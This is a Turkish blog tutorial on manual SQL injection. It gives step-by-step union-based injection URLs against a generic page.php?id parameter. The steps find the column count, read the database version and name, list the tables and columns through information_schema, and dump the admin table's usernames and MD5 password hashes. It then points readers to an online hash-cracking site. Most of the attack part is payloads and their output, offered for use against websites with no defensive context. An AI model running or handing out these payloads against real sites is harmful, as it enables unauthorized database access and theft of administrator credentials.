Manuel SQL Injection Nasıl Yapılır

0 3

Manuel SQL Injection Nedir ?

 SQL injection açığını manuel (el ile) sömürmektir.

Neden manuel sömürürüz diye sorarsanız bazen sqlmap gibi araçlar çalışmayabilir.

Bazen farklı durumlar olabilir. Her duruma karşın manuel sql injection sömürmeyi öğrenmeliyiz.

Manuel SQL Injection Nasıl Sömürülür ?

Evet şimdi manuel SQL Injection nasıl sömürülür başlayalım.

site.com/page.php?id=5  adresine gidiyorum.

Sonuna bir tırnak (‘) koydum.

Error :You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”’ at line 1

Evet hata aldık. Sitemizde bir SQL injection var.

Şimdi kolon sayısını bulacağız.

site.com/page.php?id=5+order+by+15 yazıyorum ve site

Error :Unknown column ’15’ in ‘order clause’

hatası veriyor. Bu sayıyı düşürmemiz gerekiyor. Sırasıyla düşüyoruz.

  • site.com/page.php?id=5+order+by+14  hata
  • site.com/page.php?id=5+order+by+13  hata
  • site.com/page.php?id=5+order+by+12  hata
  • site.com/page.php?id=5+order+by+11  hata
  • site.com/page.php?id=5+order+by+10  hata

.. hata

5’e geldiğimde hata almıyorum. Demek ki kolon sayımız 5. Bu siteyle alakalı bir durum.

Her sitede farklıdır. Sizler de kendi test ettiğiniz sitede deneyiniz.

 

Site.com/page.php?id=5+union+select+1,2,3,4,5

bu sefer union+select yazdık.

Site.com/page.php?id=-5+union+select+1,version(),3,4,5

Şimdiyse 2 yerine version() yazıyoruz. İsterseniz 3 yerine de yazabilirsiniz farketmez.

 

10.1.48-MariaDB

Karşıma böyle bir yazı geldi. Versiyonumuzu öğrenmiş olduk.

Site.com/page.php?id=-5+union+select+1,database(),3,4,5 yazıyoruz ve karşımıza databasemizin ismi geliyor.

https://www.rapidtables.com/convert/number/ascii-to-hex.html

Bu siteye gidip çekmek istediğimiz veri tabanı adını hex koduna dönüştürüyoruz.

63756c6f736d75735f6d757363756c başına 0x koyuyoruz.

site.com/page.php?id=-5+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=0x63756C6F736D75735F6D757363756C

evet tablolarımız gözüktü.

 

admin,caseofmonth,category,delegates,documents,faculty,gallery,homepageimg

,img_category,imggal,imguploads,ipadd,loginip,message,news,newsletter,page,

pages,photo,quicklinks,slider,socialmedia,testimonials,videos

 

Ben admin tablosunu çekeceğim için admin yazısını alıp hex koduna çevirip başına 0x koyuyorum.

Site.com/page.php?id=-5+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=0x63756C6F736D75735F6D757363756C+and+table_name=0x61646D696E

 

entry_id,user_id,password,type,status

Evet karşımıza bunlar geldi.

Site.com/page.php?id=-5+union+select+1,(user_id),(password),4,5+from+admin

 

user_id veya password yerine entry_id,user_id,password,type,status buradan birini yazabilirsiniz.

Veriler karşımıza geldi.

 

Altta ki şifremiz md5 ile şifrelenmiş bir şifre.

https://crackstation.net/ gibi sitelerden bulmaya çalışabilirsiniz.

Manuel SQL İnjection konumuzun sonuna geldik. Okuduğunuz için teşekkürler.

Bir başka konu: https://sibermanset.com/hack-the-box-invate-kodu-nasil-alinir/

Bu gönderiyi oylamak için tıklayın!
[Toplam: 0 Ortalama: 0]
Cevap bırakın

E-posta hesabınız yayımlanmayacak.